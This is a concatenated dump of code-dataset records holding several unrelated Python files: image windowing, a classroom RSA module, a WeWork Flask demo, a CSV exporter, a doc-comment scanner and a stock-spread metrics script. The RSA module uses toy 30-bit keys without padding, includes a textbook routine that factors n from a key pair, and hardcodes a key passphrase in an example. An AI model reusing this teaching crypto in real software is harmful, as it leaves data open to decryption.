manner:\n outerproduct(window(ySize), window(xSize))\n @param winName: name of the window; can be blackman, hamming, or hanning\n \"\"\" \n window = window_types.get(winName)\n if window is None: raise ValueError(\"unsupported window type: %s\"%winName)\n \n p = N.outer(window(ySize), window(xSize))\n \n #return window filter, normalizing just in case\n return p/p.max()\n\n\nclass Window (Operation):\n \"\"\"\n Apodizes the k-space data based on a specified 2D window.\n \"\"\"\n params = (\n Parameter(name=\"win_name\", type=\"str\", default=\"hanning\",\n description=\"\"\"\n Type of window. Can be blackman, hamming, or hanning.\"\"\"),)\n\n @ChannelIndependentOperation\n def run(self, image):\n # multiply the window by each slice of the image\n N.multiply(image[:], getWindow(self.win_name, image.idim, image.jdim),\n image[:])\n","repo_name":"matthew-brett/recon-tools","sub_path":"root/recon/operations/Window.py","file_name":"Window.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"37229800306","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 14 17:06:23 2019\n\n@author: mauro\n\"\"\"\n\nfrom Crypto.Util import number\n\ndef div(x,n):\n '''\n Works as follows on the example case div(25,0)\n First computes the binary repr. of 25, B = [1,1,0,0,1]\n Then, starting from q,r=0,0 and scanning B from left to right, \n computes:\n (0,0) x 2 --> (0,0) --> (0,1) {since B[0]=1}\n (0,1) x 2 --> (0,2) --> (0,3) {since B[1]=1}\n (0,3) x 2 --> (0,6) {since B[2]=0}\n --> (1,1) {since 6 exceeds 5}\n (1,1) x 2 --> (2,2) {since B[3]=0,\n (2,2) x 2 --> (4,4) --> (4,5) {since B[4]=1}\n --> (5,0) {since 5 equals 5}\n \n '''\n B = []\n # We need the bits of x from left to right\n while x > 0:\n B.insert(0,x&1)\n x = x >> 1\n q,r = 0,0\n for b in B:\n q = q << 1\n r = r << 1\n if b:\n r += 1\n if r>=n:\n r = r-n\n q = q+1\n return q,r\n\ndef modprod(x,y,n):\n if y==0:\n return 0\n q, x = div(x,n) # We are interested in the remainder only\n q, y = div(y,n)\n s = 0\n while y>0:\n if y&1:\n q, s = div(s+x,n)\n q, x = div(x<<1,n)\n y = y >> 1\n return s\n\ndef modexp(x,y,n,progress=False):\n '''\n Implementa l'algoritmo di esponenziazione \n modulare: calcola cioe' x^y mod n (dove il\n simbolo ^ indica l'elevamento a potenza)\n '''\n from math import log2\n p = 1\n q, z = div(x,n)\n while y>0:\n if progress:\n print('Approx {} bits of y remains to be processed'.\\\n format(int(log2(y))))\n if y&1:\n p = modprod(p,z,n)\n y = y >> 1\n z = modprod(z,z,n)\n return p\n\ndef rsakeys(numberofbits=30):\n p = number.getPrime(numberofbits)\n q = number.getPrime(numberofbits)\n n = p*q\n phi = (p-1)*(q-1)\n e = 3\n while number.GCD(e,phi)>1:\n e+=2\n d = number.inverse(e,phi)\n print(p,q)\n return e,d,n\n\ndef rsaencrypt(M,e,n,progress=False):\n if number.GCD(M,n)>1:\n raise ValueError('Not encryptable message')\n return modexp(M,e,n,progress)\n\ndef rsadecrypt(C,d,n,progress=False):\n return modexp(C,d,n,progress)\n\ndef commonModAttack(e,d,n):\n ''' Algorithm (explained in class) to recover the primes p and q\n given the key pair\n '''\n from math import log2\n r = e*d-1\n t = 0\n while not r&1:\n t += 1\n r = r >> 1\n numberOfAttempts = 1\n while True:\n g = number.getRandomInteger(int(log2(n)))\n p = number.GCD(g,n)\n if p>1:\n print(\"Hurry up to Vegas? It's your lucky day!\")\n return p,div(n,p)[0]\n x = modexp(g,r,n)\n x2 = modprod(x,x,n)\n while x2 != 1:\n x = x2\n x2 = modprod(x,x,n)\n p = number.GCD(x-1,n)\n if p>1:\n print(\"Success after {} attempts\".format(numberOfAttempts))\n return p,div(n,p)[0]\n numberOfAttempts += 1\n \n \n\n\n'''\n(Somewhat simplified) example of Key generation and message\nexchange using the RSA implementation under Crypto modules\n'''\n\n'''\n# Bob's (receiver's) protocol: Key generation\n# Generate the private and public keys\nfrom Crypto.PublicKey import RSA\nkey = RSA.generate(2048)\n# Export the public key to a file\npublicKey = key.publickey().exportKey()\nf = open('BobKey.pem','wb')\nf.write(publicKey)\nf.close()\n# Export the private key to a password protected file\nprivateKey = key.exportKey(passphrase='_A.V3ry.5tr0ng.Pa55w0rd_')\nf = open('rsakey.pem','wb')\nf.write(privateKey)\nf.close()\n\n# Alice's (sender's) protocol: encryption\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Random import get_random_bytes\nfrom Crypto.Cipher import AES, PKCS1_OAEP \n#OAEP stands for Optimal Asymmetric Encryption Padding\n\n# Prepare the message and import the receiver public key\nmessage = 'Questo è un messaggio di prova'.encode('utf-8')\nBobKey = RSA.importKey(open(\"BobKey.pem\").read())\n# Generate a symmetric key\nsymmetricKey = get_random_bytes(16)\n# Create an object to encrypt under known standard\nrsa = PKCS1_OAEP.new(BobKey)\n# Encrypt the symmetric key using RSA\nrsaEncryptedSymmKey = rsa.encrypt(symmetricKey)\n# Encrypt the message using AES and the symmetric key \nIV = get_random_bytes(16)\naes = AES.new(symmetricKey, AES.MODE_CFB, IV)\nencMessage = IV+aes.encrypt(message)\n# Send the pair formed by the encrypted symmetric key and the\n# encrypted message\ntoBob = (rsaEncryptedSymmKey,encMessage)\n\n# Bob's (receiver's) protocol: decryption\nrsaEncryptedSymmKey,encMessage=toBob\ng = open('rsakey.pem','r')\nkey = g.read()\nprivateKey = RSA.importKey(key,passphrase='_A.V3ry.5tr0ng.Pa55w0rd_')\ng.close()\nrsa = PKCS1_OAEP.new(privateKey)\nsymmetricKey = rsa.decrypt(rsaEncryptedSymmKey)\nIV = encMessage[:16]\naes = AES.new(symmetricKey, AES.MODE_CFB, IV)\ndecryptedMessage = aes.decrypt(encMessage)[16:]\n'''","repo_name":"leoncini/Algoritmi_di_crittografia-2019","sub_path":"RSA.py","file_name":"RSA.py","file_ext":"py","file_size_in_byte":4952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"33464569500","text":"\"\"\"\n Flask Demo App\n\"\"\"\nimport time\n\nfrom flask import Flask, request, make_response, jsonify\n\nfrom .ext import wework, wework_msg_validation, wework_msg_xml_parser\n\napp = Flask(__name__)\n\n\n@app.route(\"/wework\", methods=[\"GET\", \"POST\"])\ndef hello():\n if request.method == \"GET\":\n r_sign = request.args.get(\"msg_signature\")\n r_timestamp = request.args.get(\"timestamp\")\n r_nonce = request.args.get(\"nonce\")\n r_echo_str = request.args.get(\"echostr\")\n\n ret, reply_str = wework_msg_validation.verify_url(\n r_sign, r_timestamp, r_nonce, r_echo_str\n )\n if ret != 0:\n print(\"ERR: VerifyURL ret: \" + str(ret))\n return make_response(jsonify({\"msg\": \"error\"}))\n return make_response(reply_str)\n elif request.method == \"POST\":\n r_sign = request.args.get(\"msg_signature\")\n r_timestamp = request.args.get(\"timestamp\")\n r_nonce = request.args.get(\"nonce\")\n r_xml_data = request.data.decode(\"utf-8\")\n\n ret, content = wework_msg_validation.msg_parse(\n r_xml_data, r_sign, r_timestamp, r_nonce\n )\n\n if ret != 0:\n print(\"ERR: Decrypt error. ret: \" + str(ret))\n return make_response(jsonify({\"msg\": \"error\"}))\n\n recv_info = wework_msg_xml_parser.parse_message(content)\n print(recv_info)\n\n send_info = wework_msg_xml_parser.build_message(\n \"text\",\n ToUserName=\"xx\",\n FromUserName=\"xx\",\n CreateTime=time.time(),\n Content=\"World\",\n MsgId=1234567890123456,\n AgentID=wework.agent_id,\n )\n ret, con = wework_msg_validation.msg_build(send_info, r_nonce, r_timestamp)\n print(con)\n if ret != 0:\n print(\"ERR: Encrypt error. ret: \" + str(ret))\n return make_response(jsonify({\"msg\": \"error\"}))\n return make_response(con)\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=6001)\n","repo_name":"sns-sdks/python-workweixin","sub_path":"examples/flask_demo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"20844647071","text":"import csv\nimport json\nfrom itertools import zip_longest\n\nwith open('../data/ros-discourse_data.json') as f:\n rosd_data = json.load(f)\n\nrosd_url = [item.get('url') for item in rosd_data]\nrosd_tcontents = [item.get('thread_contents')\n for item in rosd_data]\nrosd_tdetails = [item.get('thread_details') for item in rosd_data]\nrosd_title = [item.get('title') for item in rosd_data]\nrosd_id = []\nrosd_battery = []\nrosd_energy = []\nrosd_sustain = []\nrosd_power = []\nrosd_green = []\nrosd_tcontents_new = []\nrosd_tdetails_new = []\n\ncollection_name = []\nraw_contents = []\n\nfor i in range(len(rosd_url)):\n y = \"ROSD\" + str(i)\n rosd_id.append(y)\n\nfor i in range(len(rosd_url)):\n collection_name.append(\"ROSDiscourse\")\n\nfor contents in rosd_tcontents:\n contents = ''.join(contents)\n rosd_tcontents_new.append(contents)\n\nfor details in rosd_tdetails:\n try:\n details = ''.join(details)\n rosd_tdetails_new.append(details)\n except TypeError:\n details = ''\n rosd_tdetails_new.append(details)\n\n\n# print(len(rosd_url))\n# print(len(rosd_title))\n# print(len(rosd_tcontents_new))\n# print(len(rosd_tdetails_new))\n\nfor i in range(2604):\n rcontents = rosd_tcontents_new[i] + '' + rosd_tdetails_new[i]\n raw_contents.append(rcontents)\n\nraw_contents_final = []\nfor rc in raw_contents:\n other_string = rc[0:90]\n raw_contents_final.append(other_string)\n\n# print(len(raw_contents))\n\nrosd_list = [rosd_id,\n rosd_url,\n collection_name,\n rosd_title,\n raw_contents_final,\n ]\n\nexport_data = zip_longest(*rosd_list, fillvalue='')\n\nwith open('data/social_discussion.csv', 'a', newline='') as myfile:\n wr = csv.writer(myfile)\n wr.writerows(export_data)\nmyfile.close()\n","repo_name":"S2-group/msr-2021-robotics-green-architectural-tactics-replication-package","sub_path":"RQ1_data_software/phase1_data_collection/data_to_csv/rosd_to_csv.py","file_name":"rosd_to_csv.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"25991668795","text":"import collections\nimport os.path\nimport re\n\nfrom hotdoc.core import comment, exceptions\nfrom hotdoc.utils import loggable\nfrom . import util\n\n_FIND_COMMENT = re.compile(r'/\\*\\*(.+?)\\*/', re.DOTALL)\n\n_MatchedComment = collections.namedtuple('_MatchedComment',\n ['body', 'start', 'end'])\n\n\nclass _CommentScannerException(exceptions.HotdocSourceException):\n \"\"\"Warnings with which the comment scanner diagnoses stuff that should be\n corrected in the source.\"\"\"\n pass\n\nloggable.Logger.register_warning_code('missing-class-comment',\n _CommentScannerException, 'modular-framework')\nloggable.Logger.register_warning_code('redundant-namespace',\n _CommentScannerException, 'modular-framework')\n\n\ndef _process_line(line):\n \"\"\"Remove leading asterisks from doc comment.\"\"\"\n line = line.strip()\n if line.startswith('* '):\n return line[2:]\n if line == '*':\n return ''\n return line\n\n\ndef _get_comment_bodies(source):\n \"\"\"Iterator, gets verbatim text of all raw comments in source.\"\"\"\n for match in _FIND_COMMENT.finditer(source):\n lines = match.group(1).splitlines()\n lines = map(_process_line, lines)\n\n yield _MatchedComment('\\n'.join(lines).strip(), *match.span(1))\n\n\ndef _demodulize(ident):\n \"\"\"Can't use str.capitalize() for this, because there may be capital\n letters elsewhere in the string.\"\"\"\n return str.upper(ident[0]) + ident[1:]\n\n\ndef _consume_blanks(lines):\n \"\"\"Drop all blank lines from the beginning of an array of lines, and return\n True if there are still any lines left to process.\"\"\"\n while lines and len(lines[0]) == 0:\n lines.pop(0)\n return bool(lines)\n\n\nclass Scanner(loggable.Logger):\n \"\"\"\n Takes care of extracting all the documentation comments from a source file.\n \"\"\"\n\n def _figure_line_number(self, pos):\n \"\"\"Return the line number corresponding to a file position.\"\"\"\n return next(ix for ix, val in enumerate(self._linenos) if pos < val)\n\n def _annotate_from_naturaldocs_comment(self, com):\n \"\"\"Try to put everything specific to the Naturaldocs comment format\n inside this method.\"\"\"\n lines = com.raw_comment.splitlines()\n header_match = re.match(r'(\\w+): (.*)', com.raw_comment)\n if header_match is not None:\n lines.pop(0)\n\n symbol_type, symbol_name = header_match.group(1, 2)\n if symbol_type == 'Class':\n namespace = _demodulize(os.path.basename(\n os.path.dirname(com.filename)))\n com.name = '{}.{}'.format(namespace, symbol_name)\n\n if symbol_name.startswith(namespace + '.'):\n self.warn('redundant-namespace',\n message=('Redundant namespace {} in class comment'\n .format(namespace)),\n filename=com.filename, lineno=com.lineno)\n\n com.title = util.create_text_subcomment(com, com.name)\n self._current_class = com.name\n else:\n if self._current_class is None:\n self.warn('missing-class-comment',\n message='Missing class comment', filename=com.filename,\n lineno=com.lineno)\n\n namespace = _demodulize(os.path.basename(os.path.dirname(\n com.filename)))\n classname = _demodulize(os.path.basename(com.filename[:-3]))\n self._current_class = '{}.{}'.format(namespace, classname)\n\n com.name = '{}:{}'.format(self._current_class, symbol_name)\n com.title = util.create_text_subcomment(com, symbol_name)\n\n if not _consume_blanks(lines):\n return\n\n # One-line description, followed by blank line, followed by more text,\n # means we should treat the one line as a short description\n if len(lines) > 2 and len(lines[1]) == 0:\n com.short_description = util.create_text_subcomment(com,\n lines.pop(0))\n if not _consume_blanks(lines):\n return\n\n com.description = '\\n'.join(lines)\n\n def scan(self, filename):\n \"\"\"\n Iterator, yielding `hotdoc.core.comment.Comment` instances based on\n all documentation comments (surrounded by /** */) in a source file.\n\n Args:\n filename (str): Filename to scan\n \"\"\"\n source = ''\n self._linenos = [0]\n\n with open(filename, 'r', encoding='utf-8') as f:\n line = f.readline()\n while line:\n self._linenos.append(f.tell())\n source += line\n line = f.readline()\n\n self._current_class = None\n\n for matched in _get_comment_bodies(source):\n start_line = self._figure_line_number(matched.start)\n end_line = self._figure_line_number(matched.end)\n\n com = comment.Comment(raw_comment=matched.body, filename=filename,\n lineno=start_line, endlineno=end_line)\n\n self._annotate_from_naturaldocs_comment(com)\n\n yield com\n","repo_name":"endlessm/hotdoc-modular-framework","sub_path":"hotdoc_modular_framework/comment_scanner.py","file_name":"comment_scanner.py","file_ext":"py","file_size_in_byte":5142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42644815954","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom datetime import date\r\nimport datetime as dt\r\nfrom datetime import timedelta\r\n\r\no_time = 10 * 60*60 * 1000000\r\nc_time = 16 * 60*60 * 1000000 + 45 * 60 * 1000000\r\ndef metric(filename):\r\n df = pd.read_csv(filename)\r\n df['venue'] = df['#RIC'].str.split('.', expand=True)[1]\r\n df['stock'] = df['#RIC'].str.split('.', expand=True)[0]\r\n # df['timestamp'] = (df['Date[L]'] + df['Time[L]'])\r\n df['timestamp'] = pd.to_datetime(df['Date-Time'], utc=False)\r\n df['timestamp'] = df['timestamp'].dt.tz_localize('UTC').dt.tz_convert('Pacific/Auckland')\r\n df['date'] = df['timestamp'].dt.date\r\n df['time'] = df['timestamp'].dt.time\r\n # df['adj timestamp'] = df['timestamp']-timedelta(hours=13)\r\n # df['adj timestamp'] = df['timestamp']-timedelta(hours=13)\r\n # correct daylight saving\r\n # df['adj timestamp'] = np.where(((df['date']>date(2017,10,1))&(df['date']<=date(2018,3,31)))|(df['date']>date(2018,9,30)), df['adj timestamp']+timedelta(hours=1),df['adj timestamp'])\r\n # df['adj timestamp'] = df['adj timestamp']-timedelta(hours=13)\r\n # correct time\r\n # column went wrong\r\n # df[['Price','Volume','Buyer ID','Seller ID','Qualifiers','Tick Dir.']] = df.groupby(['stock','date'])[['Price','Volume','Buyer ID','Seller ID','Qualifiers','Tick Dir.']].shift(-2)\r\n df['Price'] = df.groupby(['stock', 'date'])['Price'].shift(-2)\r\n df['Volume'] = df.groupby(['stock', 'date'])['Volume'].shift(-2)\r\n df['Buyer ID'] = df.groupby(['stock', 'date'])['Buyer ID'].shift(-2)\r\n df['Seller ID'] = df.groupby(['stock', 'date'])['Seller ID'].shift(-2)\r\n df['Qualifiers'] = df.groupby(['stock', 'date'])['Qualifiers'].shift(-2)\r\n df['Tick Dir.'] = df.groupby(['stock', 'date'])['Tick Dir.'].shift(-2)\r\n\r\n # df.to_csv('ARG_v3.csv')\r\n # df = df[df['Type']=='Quote']\r\n df = df[(df['Price'].notnull()) | (df['Bid Price'].notnull())]\r\n\r\n # for realized spread (hypothetical timeframe)\r\n # df['TS_1m'] = df['adj timestamp'] + timedelta(minutes=1)\r\n\r\n # time in microsecond\r\n df['mtime'] = df['time'].apply(\r\n lambda x: x.hour * 3600 * 1000000 + x.minute * 60 * 1000000 + x.second * 1000000 + x.microsecond)\r\n df['adj mtime'] = np.where(\r\n ((df['date'] > date(2017, 10, 1)) & (df['date'] <= date(2018, 3, 31))) | (df['date'] > date(2018, 9, 30)),\r\n df['mtime'] + 3600 * 1000000, df['mtime'])\r\n df['mtime_1m'] = df['adj mtime'] + 60 * 1000000\r\n df['Ask Size abs'] = df['Ask Size']\r\n df['Bid Size abs'] = df['Bid Size']\r\n # fil in quoting status of the previous quote\r\n quotes_cols = ['Bid Price', 'Bid Size', 'Ask Price', 'Ask Size', 'Ask Size abs', 'Bid Size abs']\r\n # df = df.sort_values(['venue', 'extra_timestamp'])\r\n df[quotes_cols] = df.groupby(['venue'])[quotes_cols].fillna(method='ffill')\r\n\r\n df['MidQuote'] = np.where((df['Bid Price'] != 0) & (df['Ask Price'] != 0),\r\n (df['Bid Price'] + df['Ask Price']) / 2.0, np.nan)\r\n\r\n # assign trade direction\r\n\r\n df['direction'] = np.where(df['Price'] > df['MidQuote'], 'B', np.nan)\r\n df['direction'] = np.where(df['Price'] < df['MidQuote'], 'S', df['direction'])\r\n df['direction'] = np.where(df['Price'] == df['MidQuote'], 'C', df['direction'])\r\n df = df[df['Qualifiers']!='SPM[GV4_TEXT]']\r\n # o_time = dt.time(10, 0, 0)\r\n # c_time = dt.time(17, 0, 0)\r\n # df = df[(df['time'] > o_time) & (df['time'] < c_time)]\r\n\r\n\r\n df = df[(df['adj mtime'] > o_time) & (df['adj mtime'] < c_time)]\r\n\r\n # adjust currency\r\n daily_fx = pd.read_csv('C:/Users/anche/NZ/data/daily fx.csv')\r\n daily_fx['date'] = pd.to_datetime(daily_fx['date']).dt.date\r\n daily_fx['midquote'] = pd.to_numeric(daily_fx['midquote'], errors='coerce')\r\n df = df.merge(daily_fx, on=['date'], suffixes=['', '_fx'], how='left')\r\n df['Price'] = df['Price'] * df['midquote']\r\n df['Bid Price'] = df['Bid Price'] * df['midquote']\r\n df['Ask Price'] = df['Ask Price'] * df['midquote']\r\n df['MidQuote'] = df['MidQuote'] * df['midquote']\r\n\r\n # continue other metric\r\n df['value'] = df['Price'] * df['Volume']\r\n df['old fee'] = df['value'].apply(lambda x: min(1 + 0.002 * x, 75))\r\n df['new fee'] = df['value'].apply(lambda x: min(0.0045 * x, 75))\r\n df['fee diff'] = df['new fee'] - df['old fee']\r\n df['fee change'] = df['fee diff'] / ((df['new fee'] + df['old fee']) / 2)\r\n df_trades = df[df['Price'].notnull()]\r\n # per stock per day fee difference\r\n fee_diff = df.groupby(['date', 'stock'])['fee diff'].sum().reset_index()\r\n per_stock_fee_diff = fee_diff.groupby(['stock'])['fee diff'].mean().reset_index()\r\n\r\n fee_change = df.groupby(['date', 'stock'])['fee change'].mean().reset_index()\r\n per_stock_fee_change = fee_change.groupby(['stock'])['fee change'].mean().reset_index()\r\n\r\n df['fee increase'] = np.where(df['new fee'] > df['old fee'], 1, 0)\r\n df['fee decrease'] = np.where(df['new fee'] < df['old fee'], 1, 0)\r\n df['fee unchanged'] = np.where(df['new fee'] == df['old fee'], 1, 0)\r\n df['trades'] = np.where(df['Price'].notnull(), 1, 0)\r\n fee_increase = (df.groupby(['date', 'stock'])['fee increase'].sum() / df.groupby(['date', 'stock'])[\r\n 'trades'].sum()).reset_index()\r\n fee_increase = fee_increase.rename(columns={0: 'perc_fee_increase'})\r\n per_stock_fee_increase = fee_increase.groupby(['stock'])['perc_fee_increase'].mean().reset_index()\r\n daily_value = df.groupby(['date', 'stock'])['value'].sum().reset_index()\r\n daily_value = daily_value.rename(columns={'value': 'daily_value'})\r\n df = df.merge(daily_value, on=['date', 'stock'], how='left')\r\n df['issue'] = np.where(((df['direction'] == 'S') & (df['Price'] < df['Bid Price'])) | (\r\n (df['direction'] == 'B') & (df['Price'] > df['Ask Price'])), 1, 0)\r\n\r\n df['vol_issue'] = np.where(((df['direction'] == 'S') & (df['Volume'] > df['Bid Size abs'])) | (\r\n (df['direction'] == 'B') & (df['Volume'] > df['Ask Size abs'])), 1, 0)\r\n df['quote_alive'] = df.groupby(['stock', 'date'])['adj mtime'].shift(-1) - df['adj mtime']\r\n df['quote_alive'] = df['quote_alive'].replace(0, np.nan)\r\n df['quote_alive'] = df['quote_alive'].fillna(method='ffill')\r\n\r\n df['Quoted Spread'] = np.where(\r\n (df['Ask Price'] != 0) & (df['Bid Price'] != 0) & (df['Ask Price'] > df['Bid Price']),\r\n df['Ask Price'] - df['Bid Price'], np.nan)\r\n df['Quoted Spread bps'] = np.where(\r\n (df['Ask Price'] != 0) & (df['Bid Price'] != 0) & (df['Ask Price'] > df['Bid Price']),\r\n (df['Ask Price'] - df['Bid Price']) / (df['MidQuote']), np.nan)\r\n df['Quoted Spread_TW'] = df['Quoted Spread'] * df['quote_alive']\r\n df['Quoted Spread bps_TW'] = df['Quoted Spread bps'] * df['quote_alive']\r\n df[f'at tick'] = np.where(\r\n ((df['Quoted Spread'] < 0.01) & (df['MidQuote'] > 0.2)) | (\r\n (df['Quoted Spread'] < 0.001) & (df['MidQuote'] < 0.2)), 1, 0)\r\n df[f'at tick time'] = df['at tick'] * df['quote_alive']\r\n b_sel = df.direction == 'B'\r\n df.loc[b_sel, f'Effective Spread'] = 2 * (df.loc[b_sel, f'Price'] - df.loc[b_sel, 'MidQuote'])\r\n s_sel = df.direction == 'S'\r\n df.loc[s_sel, f'Effective Spread'] = 2 * (df.loc[s_sel, 'MidQuote'] - df.loc[s_sel, f'Price'])\r\n\r\n df[f'Effective Spread_VW'] = df[f'Effective Spread'] * df[f'value']\r\n df.loc[b_sel, f'Effective Spread bps'] = 2 * (df.loc[b_sel, f'Price'] - df.loc[b_sel, 'MidQuote']) / df.loc[\r\n b_sel, 'MidQuote']\r\n df.loc[s_sel, f'Effective Spread bps'] = 2 * (df.loc[s_sel, 'MidQuote'] - df.loc[s_sel, f'Price']) / df.loc[\r\n s_sel, 'MidQuote']\r\n\r\n df[f'Effective Spread bps_VW'] = df[f'Effective Spread bps'] * df[f'value']\r\n\r\n trade_size = df.groupby(['date', 'stock'])['value'].mean().reset_index()\r\n trade_size = trade_size.rename(columns={'value': 'trade size'})\r\n\r\n Quoted_spread_TW = (df.groupby(['stock', 'date'])['Quoted Spread_TW'].sum() / \\\r\n df.groupby(['stock', 'date'])['quote_alive'].sum()).reset_index()\r\n Quoted_spread_TW = Quoted_spread_TW.rename(columns={0: 'quoted spread'})\r\n\r\n df['MidQuote_TW'] = df['MidQuote'] * df['quote_alive']\r\n\r\n midpoint_TW = (df.groupby(['stock', 'date'])['MidQuote_TW'].sum() / \\\r\n df.groupby(['stock', 'date'])['quote_alive'].sum()).reset_index()\r\n midpoint_TW = midpoint_TW.rename(columns={0: 'midpoint'})\r\n Quoted_spread_bps_TW = (df.groupby(['stock', 'date'])['Quoted Spread bps_TW'].sum() / \\\r\n df.groupby(['stock', 'date'])['quote_alive'].sum()).reset_index()\r\n Quoted_spread_bps_TW = Quoted_spread_bps_TW.rename(columns={0: 'quoted spread bps'})\r\n\r\n min_tick_TW = (df.groupby(['stock', 'date'])['at tick time'].sum() / \\\r\n df.groupby(['stock', 'date'])[\r\n 'quote_alive'].sum()).reset_index()\r\n min_tick_TW = min_tick_TW.rename(columns={0: 'tick time'})\r\n\r\n Value_weighted_Effective_Spread = (df.groupby(['stock', 'date'])['Effective Spread_VW'].sum() / \\\r\n df[df['Effective Spread_VW'].notnull()].groupby(['stock', 'date'])[\r\n 'value'].sum()).reset_index()\r\n Value_weighted_Effective_Spread = Value_weighted_Effective_Spread.rename(\r\n columns={0: 'value weighted effective spread'})\r\n\r\n Value_weighted_Effective_Spread_bps = ((df.groupby(['stock', 'date'])['Effective Spread bps_VW'].sum() / \\\r\n df[df['Effective Spread bps_VW'].notnull()].groupby(['stock', 'date'])[\r\n 'value'].sum()) * 10000).reset_index()\r\n Value_weighted_Effective_Spread_bps = Value_weighted_Effective_Spread_bps.rename(\r\n columns={0: 'value weighted effective spread bps'})\r\n\r\n # realized spread\r\n df = df.sort_values('adj mtime', ascending=True)\r\n df_realized = pd.merge_asof(df, df[['stock', 'date', 'adj mtime', 'MidQuote']], left_on=['mtime_1m'],\r\n right_on=['adj mtime'],\r\n by=['stock', 'date'], suffixes=('', '_1m_matched'),\r\n allow_exact_matches=False)\r\n\r\n b_sel = df_realized.direction == 'B'\r\n df_realized.loc[b_sel, f'Realized Spread'] = 2 * (\r\n df_realized.loc[b_sel, f'Price'] - df_realized.loc[b_sel, 'MidQuote_1m_matched'])\r\n s_sel = df_realized.direction == 'S'\r\n df_realized.loc[s_sel, f'Realized Spread'] = 2 * (\r\n df_realized.loc[s_sel, 'MidQuote_1m_matched'] - df_realized.loc[s_sel, f'Price'])\r\n\r\n df_realized[f'Realized Spread_VW'] = df_realized[f'Realized Spread'] * df_realized[f'value']\r\n df_realized.loc[b_sel, f'Realized Spread bps'] = 2 * (\r\n df_realized.loc[b_sel, f'Price'] - df_realized.loc[b_sel, 'MidQuote_1m_matched']) / df_realized.loc[\r\n b_sel, 'MidQuote_1m_matched']\r\n df_realized.loc[s_sel, f'Realized Spread bps'] = 2 * (\r\n df_realized.loc[s_sel, 'MidQuote_1m_matched'] - df_realized.loc[s_sel, f'Price']) / df_realized.loc[\r\n s_sel, 'MidQuote_1m_matched']\r\n\r\n df_realized[f'Realized Spread bps_VW'] = df_realized[f'Realized Spread bps'] * df_realized[f'value']\r\n\r\n Value_weighted_Realized_Spread = (df_realized.groupby(['stock', 'date'])['Realized Spread_VW'].sum() / \\\r\n df_realized[df_realized['Realized Spread_VW'].notnull()].groupby(\r\n ['stock', 'date'])['value'].sum()).reset_index()\r\n\r\n Value_weighted_Realized_Spread = Value_weighted_Realized_Spread.rename(\r\n columns={0: 'value weighted realized spread'})\r\n\r\n Value_weighted_Realized_Spread_bps = ((df_realized.groupby(['stock', 'date'])['Realized Spread bps_VW'].sum() / \\\r\n df_realized[df_realized['Realized Spread bps_VW'].notnull()].groupby(\r\n ['stock', 'date'])['value'].sum()) * 10000).reset_index()\r\n Value_weighted_Realized_Spread_bps = Value_weighted_Realized_Spread_bps.rename(\r\n columns={0: 'value weighted realized spread bps'})\r\n\r\n # compute market order\r\n market_order = df.groupby(['stock', 'date', 'adj mtime'])['value'].sum().reset_index()\r\n\r\n daily_market_order = market_order.groupby(['stock', 'date'])['value'].mean().reset_index()\r\n daily_market_order = daily_market_order.rename(columns={'value': 'market order value'})\r\n\r\n # compute price order\r\n\r\n df['bid diff'] = df.groupby(['stock', 'venue', 'date'])['Bid Price'].diff()\r\n df['bid order'] = np.where(df['bid diff'] == 0, df.groupby(['stock', 'venue', 'date'])['Bid Size abs'].diff(),\r\n np.nan)\r\n df['bid order'] = np.where(df['bid diff'] > 0, df['Bid Size abs'], df['bid order'])\r\n\r\n df['bid order'] = np.where(df['bid order'] > 0, df['bid order'], np.nan)\r\n\r\n df['ask diff'] = df.groupby(['stock', 'venue', 'date'])['Ask Price'].diff()\r\n df['ask order'] = np.where(df['ask diff'] == 0, df.groupby(['stock', 'venue', 'date'])['Ask Size abs'].diff(),\r\n np.nan)\r\n df['ask order'] = np.where(df['ask diff'] < 0, df['Ask Size abs'], df['ask order'])\r\n df['ask order'] = np.where(df['ask order'] > 0, df['ask order'], np.nan)\r\n\r\n daily_bid_order = df.groupby(['stock', 'date'])['bid order'].mean().reset_index()\r\n daily_bid_order = daily_bid_order.rename(columns={'bid order': 'bid order value'})\r\n\r\n daily_ask_order = df.groupby(['stock', 'date'])['ask order'].mean().reset_index()\r\n daily_ask_order = daily_ask_order.rename(columns={'ask order': 'ask order value'})\r\n\r\n daily_order = daily_bid_order.merge(daily_ask_order, on=['stock', 'date'])\r\n\r\n num_quote_update = df.groupby(['stock', 'date'])['Bid Price'].count().reset_index()\r\n num_quote_update = num_quote_update.rename(columns={'Bid Price': 'num_quote_update'})\r\n\r\n num_trades = df.groupby(['stock', 'date'])['Price'].count().reset_index()\r\n num_trades = num_trades.rename(columns={'Price': 'num_trades'})\r\n fee_diff['date'] = pd.to_datetime(fee_diff['date'])\r\n fee_change['date'] = pd.to_datetime(fee_change['date'])\r\n fee_increase['date'] = pd.to_datetime(fee_increase['date'])\r\n daily_value['date'] = pd.to_datetime(daily_value['date'])\r\n Quoted_spread_TW['date'] = pd.to_datetime(Quoted_spread_TW['date'])\r\n\r\n min_tick_TW['date'] = pd.to_datetime(min_tick_TW['date'])\r\n Value_weighted_Effective_Spread['date'] = pd.to_datetime(Value_weighted_Effective_Spread['date'])\r\n Value_weighted_Effective_Spread_bps['date'] = pd.to_datetime(Value_weighted_Effective_Spread_bps['date'])\r\n Value_weighted_Realized_Spread['date'] = pd.to_datetime(Value_weighted_Realized_Spread['date'])\r\n Value_weighted_Realized_Spread_bps['date'] = pd.to_datetime(Value_weighted_Realized_Spread_bps['date'])\r\n daily_market_order['date'] = pd.to_datetime(daily_market_order['date'])\r\n daily_order['date'] = pd.to_datetime(daily_order['date'])\r\n num_quote_update['date'] = pd.to_datetime(num_quote_update['date'])\r\n 